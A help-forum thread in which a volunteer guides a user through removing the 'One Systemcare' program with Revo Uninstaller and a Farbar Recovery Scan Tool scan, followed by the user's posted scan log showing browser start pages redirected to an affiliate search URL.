Remove One Systemcare [Solved]


  • This topic is locked

#1
moles926

Hi,

Please help to remove One Systemcare from my PC. It appeared on my computer a few days ago, and although it does not currently seem to be affecting my computer's performance, I figured it is probably malware. I have uninstalled it from the Control Panel, but the program is evidently still on my computer.

Any help greatly appreciated.



#2
pystryker

Hello and welcome to Geeks To Go! My nickname is Pystryker :) , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you:
  • If you are receiving help for this issue at another forum, please let me know so I can close this thread.
  • Please download to and run all requested tools from your Desktop.
  • Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
  • At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly". This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
  • If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
  • Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
  • This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
  • Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
  • It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you backup any critical personal files on your machine before we start.
  • If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
  • If you are unsure of an instruction I give you, or if something unexpected occurs, Do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
  • Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
  • Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future.
  • Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way. :)
Now, let's get started, shall we? :thumbsup:


Hello, let's use Revo Uninstaller to completely uninstall it, and then we'll get a look at your system and see what remains to be taken care of. :)


Step 1: Revo Uninstaller
  • Please download and install Revo Uninstaller Free
  • Double click Revo Uninstaller to run it.
  • From the list of programs double click on One Systemcare
  • NOTE: If One SystemCare doesn't appear in the list of programs, please skip this step and proceed to Step 2. If it is in the list, please continue.
  • When prompted if you want to uninstall click Yes.
  • Be sure the Moderate option is selected then click Next.
  • The program will run. If prompted again, click Yes.
  • When the built-in uninstaller is finished click on Next.
  • Once the program has searched for leftovers click Next.
  • Check/tick the bolded items only on the list then click Delete
  • When prompted click on Yes and then on next.
  • Put a check on any folders that are found and select delete
  • When prompted select yes then on next
  • Once done click Finish.

Step 2: Scan with Farbar's Recovery Scan Tool (FRST)

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Place a check in the box marked Addition.txt
  • Press the Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Please let me know if Revo uninstalled the program.

FRST Log

Addition.txt Log


#3
moles926


Ok, thanks. I'm pretty sure I have completed all of the above steps. Revo has uninstalled One Systemcare. FRST and Addition log to follow below.



#4
moles926

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-02-2016
Ran by Molly Poole (administrator) on POOLE-PC (09-02-2016 14:34:08)
Running from D:\Users\Molly Poole\Desktop
Loaded Profiles: Molly Poole (Available Profiles: Molly Poole & Molly)
Platform: Windows 8.1 Pro (X64) Language: English (United Kingdom)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Common Files\Nuance\dgnsvc.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\epson\MyEpson Portal\mepService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
() C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe
(Validity Sensors, Inc.) C:\Windows\System32\valWBFPolicyService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Common Files\Nuance\loggerservice.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\epson\MyEpson Portal\mep.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(ShenZhen Enode Techology co,.Ltd) C:\Program Files (x86)\WeatherTool\2.0.0.10998\weather.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATINEE.EXE
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATINEE.EXE
(Flexera Software LLC.) C:\ProgramData\FLEXnet\Connect\11\agent.exe
(Flexera Software LLC.) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
() C:\Program Files (x86)\Spellex\Spellex Dictation\spxsr.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\CSISYNCCLIENT.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Farbar) D:\Users\Molly Poole\Desktop\FRST64 (1).exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8444632 2015-08-04] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2817776 2014-04-11] (Synaptics Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-09] (Apple Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60688 2015-11-20] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\\isuspm.exe [2068856 2011-10-12] (Flexera Software LLC.)
HKLM-x32\...\Run: [Spellex] => C:\Program Files (x86)\Spellex\Spellex Dictation\spxsr.exe [53760 2015-02-12] ()
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1065968 2015-07-23] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [2068856 2011-10-12] (Flexera Software LLC.)
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATINEE.EXE [298560 2013-12-16] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [EPLTarget\P0000000000000001] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATINEE.EXE [298560 2013-12-16] (SEIKO EPSON CORPORATION)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{139019A9-051D-4E9B-8DE0-B85849599CA1}: [DhcpNameServer] 192.168.5.253
Tcpip\..\Interfaces\{E290C363-028E-443D-B7BF-CFA28FF92AE5}: [DhcpNameServer] 192.168.0.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.co.uk
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.co.uk/?gws_rd=ssl
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://uk.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://uk.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1343854479-873069186-2863876452-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://uk.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1343854479-873069186-2863876452-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://uk.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro&p={searchTerms}
BHO: Dragon Web Extension For Internet Explorer -> {609C0837-8DD3-4F9B-AAC5-446F36BC0353} -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\x64\dgnriaie_x64.dll [2014-07-12] (Nuance Communications, Inc.)
BHO: Easy Photo Print -> {9421DD08-935F-4701-A9CA-22DF90AC4EA6} -> C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll [2015-07-31] (Seiko Epson Corporation)
BHO-x32: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2016-01-19] (Microsoft Corporation)
BHO-x32: Dragon Web Extension For Internet Explorer -> {609C0837-8DD3-4F9B-AAC5-446F36BC0353} -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\dgnriaie.dll [2014-07-12] (Nuance Communications, Inc.)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2016-01-17] (Microsoft Corporation)
Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll [2015-07-31] (Seiko Epson Corporation)
Toolbar: HKLM-x32 - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
 
FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-16] (VideoLAN)
FF Plugin: nuance.com/DgnRia2_x86_64 -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\x64\npDgnRia2_x64.dll [2014-07-12] (Nuance Communications, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin-x32: nuance.com/DgnRia2 -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\npDgnRia2.dll [2014-07-12] (Nuance Communications, Inc.)
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on
FF Extension: E-Web Print - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on [2015-12-14] [not signed]
 
Chrome: 
=======
CHR HomePage: Default -> hxxps://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro
CHR StartupUrls: Default -> "hxxps://www.google.co.uk/","hxxp://www.uea.ac.uk/is/portal","hxxp://en-gb.facebook.com/"
CHR Profile: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-14]
CHR Extension: (Google Docs) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-31]
CHR Extension: (Google Drive) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-31]
CHR Extension: (YouTube) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-31]
CHR Extension: (Google Search) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-31]
CHR Extension: (Google Sheets) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-14]
CHR Extension: (Google Docs Offline) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-31]
CHR Extension: (AdBlock) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-02-07]
CHR Extension: (Unlimited Free VPN - Hola) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2016-02-05]
CHR Extension: (Nebula) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlmflgnnmmojlnbmaokpfcjdkhkjbnok [2016-02-01]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-12-14]
CHR Extension: (Hola - Unlimited Proxy VPN) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\opalpjjboefohnelaemnhdhlceibbcgl [2016-01-31]
CHR Extension: (Gmail) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-31]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2772720 2016-01-17] (Microsoft Corporation)
R2 DragonLoggerService; C:\Program Files (x86)\Common Files\Nuance\loggerservice.exe [137280 2014-07-12] (Nuance Communications, Inc.)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [328296 2014-10-17] (Intel Corporation)
R2 MyEpson Portal Service; C:\Program Files (x86)\EPSON\MyEpson Portal\mepService.exe [703984 2014-09-22] (SEIKO EPSON CORPORATION)
S3 Olympus DVR Service; C:\Program Files (x86)\Common Files\Olympus Shared\DeviceManager\olydvrsv.exe [174592 2012-11-08] (OLYMPUS IMAGING CORP.) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [293080 2015-08-04] (Realtek Semiconductor)
S2 SpxDictService; C:\Program Files (x86)\Spellex\Spellex Dictation\SpxDictService.exe [17920 2015-02-12] () [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-04-11] (Synaptics Incorporated)
R2 TheDesktopWeatherService; C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe [152008 2015-11-02] ()
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [41472 2014-01-01] (Validity Sensors, Inc.) [File not signed]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-10-07] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-10-07] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [126976 2014-09-03] (Intel Corporation)
S3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [508120 2014-08-15] (Realsil Semiconductor Corporation)
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [3556056 2014-10-28] (Realtek Semiconductor Corporation                           )
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [31472 2014-04-11] (Synaptics Incorporated)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44560 2015-10-07] (Microsoft Corporation)
